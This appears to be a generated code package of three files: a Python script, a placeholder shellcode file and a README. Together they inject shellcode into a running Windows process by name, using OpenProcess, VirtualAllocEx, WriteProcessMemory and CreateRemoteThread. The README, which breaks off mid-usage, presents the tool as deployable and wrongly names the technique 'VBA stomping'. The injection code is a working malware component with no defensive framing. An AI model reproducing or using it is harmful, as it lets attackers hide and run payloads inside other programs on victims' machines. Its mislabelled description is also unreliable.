[
    {
        "file_name": "stomper.py",
        "file_content": "import os\nimport sys\nimport ctypes\nimport subprocess\n\n# Function to inject shellcode into a target process\ndef inject_shellcode(target_pid, shellcode):\n    # Open the target process\n    h_process = ctypes.windll.kernel32.OpenProcess(0x001F0FFF, False, target_pid)\n    if not h_process:\n        print(f\"Failed to open process with PID {target_pid}\")\n        return\n\n    # Allocate memory in the target process for the shellcode\n    addr = ctypes.windll.kernel32.VirtualAllocEx(h_process, 0, len(shellcode), 0x1000 | 0x20, 0x40)\n    if not addr:\n        print(\"Failed to allocate memory in the target process\")\n        ctypes.windll.kernel32.CloseHandle(h_process)\n        return\n\n    # Write the shellcode to the allocated memory\n    if not ctypes.windll.kernel32.WriteProcessMemory(h_process, addr, shellcode, len(shellcode), None):\n        print(\"Failed to write shellcode to the target process\")\n        ctypes.windll.kernel32.VirtualFreeEx(h_process, addr, 0, 0x8000)\n        ctypes.windll.kernel32.CloseHandle(h_process)\n        return\n\n    # Create a remote thread in the target process to execute the shellcode\n    thread_id = ctypes.c_ulong(0)\n    if not ctypes.windll.kernel32.CreateRemoteThread(h_process, None, 0, addr, None, 0, ctypes.byref(thread_id)):\n        print(\"Failed to create remote thread in the target process\")\n        ctypes.windll.kernel32.VirtualFreeEx(h_process, addr, 0, 0x8000)\n        ctypes.windll.kernel32.CloseHandle(h_process)\n        return\n\n    print(f\"Shellcode injected into process with PID {target_pid}\")\n    ctypes.windll.kernel32.CloseHandle(h_process)\n\n# Function to find the PID of a process by name\ndef find_process_by_name(process_name):\n    try:\n        result = subprocess.run(['tasklist', '/FI', f'IMAGENAME eq {process_name}'], capture_output=True, text=True)\n        for line in result.stdout.splitlines():\n            if process_name in line:\n                return int(line.split()[1])\n        return None\n    except Exception as e:\n        print(f\"Error finding process: {e}\")\n        return None\n\n# Main function to stomp a target process\ndef main(target_process, shellcode_file):\n    # Read the shellcode from the file\n    with open(shellcode_file, 'rb') as f:\n        shellcode = f.read()\n\n    # Find the PID of the target process\n    target_pid = find_process_by_name(target_process)\n    if not target_pid:\n        print(f\"Target process {target_process} not found\")\n        return\n\n    # Inject the shellcode into the target process\n    inject_shellcode(target_pid, shellcode)\n\nif __name__ == \"__main__\":\n    if len(sys.argv) != 3:\n        print(\"Usage: python stomper.py <target_process> <shellcode_file>\")\n        sys.exit(1)\n\n    target_process = sys.argv[1]\n    shellcode_file = sys.argv[2]\n    main(target_process, shellcode_file)"
    },
    {
        "file_name": "shellcode.bin",
        "file_content": "# This file should contain the raw shellcode bytes. For example:\n# \\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\\x50\\x30...\n# The actual shellcode bytes will depend on the payload you want to inject."
    },
    {
        "file_name": "README.md",
        "file_content": "# VBA Stomping Python Program\n\nThis program injects shellcode into a target process using Python. It is designed to be effective and deployable across multiple files.\n\n## Files\n\n1. **stomper.py**: The main Python script that handles process injection.\n2. **shellcode.bin**: A binary file containing the shellcode to be injected.\n3. **README.md**: This documentation file.\n\n## Usage\n\n1. Prepare your shellcode and save it as `shellcode.bin`.\n2. Run the `stomper.py` script with the target process name and the shellcode file as arguments:"
    }
]